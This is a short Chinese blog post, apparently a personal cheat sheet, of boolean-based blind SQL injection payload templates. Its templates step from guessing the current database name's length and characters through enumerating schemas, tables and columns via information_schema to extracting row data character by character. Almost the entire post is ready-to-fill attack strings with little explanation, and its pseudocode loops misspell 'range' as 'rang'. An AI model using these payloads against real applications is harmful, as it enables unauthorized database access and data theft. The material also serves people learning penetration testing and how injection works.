手工sql注入之布尔注入

塞班

布尔注入

0猜解当前数据库名长度

1'and length(database()) <= {}#

0猜解当前数据库名

for i in rang(n):
    1' and ascii(substr(database(),%d,1)) <= {} #

1猜解数据库数量

1'and (SELECT count(schema_name) FROM information_schema.SCHEMATA) <= {}#

1猜解每个数据库名长度

for i in rang(n):
    1'and length((SELECT schema_name FROM information_schema.SCHEMATA LIMIT %d,1)) <= {}#

1猜解数据库名

1' and ascii(substr((SELECT schema_name FROM information_schema.SCHEMATA LIMIT %d,1),%d,1)) <= {} #

2猜解表数量

1' and (select count(table_name) from information_schema.tables where table_schema='%s') <={} #

2猜解表名长度

1'and length((select table_name from information_schema.tables where table_schema='%s' limit %d, 1)) <= {}#

2猜解表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1)) <={} #

3猜解字段数量

1' and (select count(column_name) from information_schema.columns where table_name='%s' and table_schema='%s') <= {} #

3猜解字段名长度

1' and length((select column_name from information_schema.columns where table_name='%s' and table_schema='%s' limit %i,1))<={} #

3猜解字段名

1' and ascii(substr((select column_name from information_schema.columns where table_name='%s' and table_schema='%s' limit %d,1),%d,1)) <= {} #

4猜解字段数据量

1' and (select count({col}) from {db}.{tb}) <=

4猜解数据长度

1' and length((select {col} from {db}.{tb} limit {n},1)) <=

4猜解数据

1' and ascii(substr((select {col} from {db}.{tb} limit {n},1),{j},1)) <=
安全sql注入
阅读 79
本作品系原创,采用《署名-非商业性使用-禁止演绎 4.0 国际》许可协议
avatar
1 声望
0 粉丝
0 条评论
avatar
1 声望
0 粉丝
宣传栏